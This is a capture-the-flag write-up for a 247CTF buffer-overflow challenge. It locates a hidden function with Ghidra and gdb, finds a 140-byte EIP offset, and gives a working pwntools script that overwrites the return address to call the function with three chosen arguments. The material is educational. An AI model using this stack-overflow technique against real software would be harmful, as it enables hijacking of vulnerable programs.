![6e6bfa535b863692b8813994ce5fcb03.png](0153c2791a3845058c6d96370cf5b235.png)
We need to call the hidden `flag` function and pass it some parameters. I used ghidra to take a look at the function
![a667f64a9ae418de64ec7be7c49d5f17.png](5cdd2f4781174688b94c23f8dca312b6.png)
So we need to pass it `0x1337`, `0x247`, and `0x12345678`
Let's find the function using `gdb`
`info func`
![03b462ec387899400230b91290c24296.png](93de95d5d266449290c77ede45b99d29.png)
The function is at `0x08048576`
Now let's find the offset
`pattern create 200`
Pass the pattern to the program
![b5a7d835eec89459242c6eec7b3d7837.png](82d6c47046604bf8ab7005d522ec59fa.png)
We got the segfault at `0x6261616b`, let's use `pattern search` to find the offset
![35f868eb885d113a1007cbeec300699c.png](3433d02b780a45d4a61862038b7b680c.png)
Okay, so now we know the offset. Let's test to make sure we can control `EIP`
`pi print('A'*140 + 'B'*4)`
Passing that to the program we see we get a segfault at `0x424242`. Perfect. We control `EIP`
![5fd9af10a99dcef0894c78b596c2acee.png](b87c64c10cb546b6ab18bb3d7dc5c7e2.png)
Let's build our payload.
The structure of our payload is as follows:
`padding + flagfunc + 4 bytes for a return address + param1 + param2 + param3`
1. Padding
1. 'A' * 140, we found this earlier
2. Flag Function Address
1. p32(0x08048576) - Packing the address in little endian format using pwntools
3. Four bytes for a return address
1. 'B' * 4, you can use whatever. It doesn't matter, just needs to be four bytes
4. Parameter 1
1. p32(0x1337) - First parameter that needs to be passed, packed in little endian format using pwntools
5. Parameter 2
1. p32(0x247) - Second parameter that needs to be passed, packed in little endian format using pwntools
6. Parameter 3
1. p32(0x12345678) - Third parameter that needs to be passed, packed in little endian format using pwntools
My solve script:
```Python
#import pwntools
from pwn import *
#create the process
p = process('./hidden_flag_function_with_args')
#attach it to gdb
gdb.attach(p)
#create the connection
#p = remote('458b4cea0dae8dff.247ctf.com', 50078)
#payload variables
padding = b'A' * 140
param3 = p32(0x12345678)
param2 = p32(0x247)
param1 = p32(0x1337)
funcloc = p32(0x08048576)
#payload
payload = padding + funcloc + b'B'*4 + param1 + param2 + param3
#recieves the data the program spits out up to 'though:'
print(p.recvuntil('though:'))
#recieves the newline character
p.recvline()
#sends the payload
p.sendline(payload)
#recieves the flag
print(p.recvall())
```
---
Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]]
Tags: #ctf #exploit_development #buffer_overflow #scripting #pwn
Related: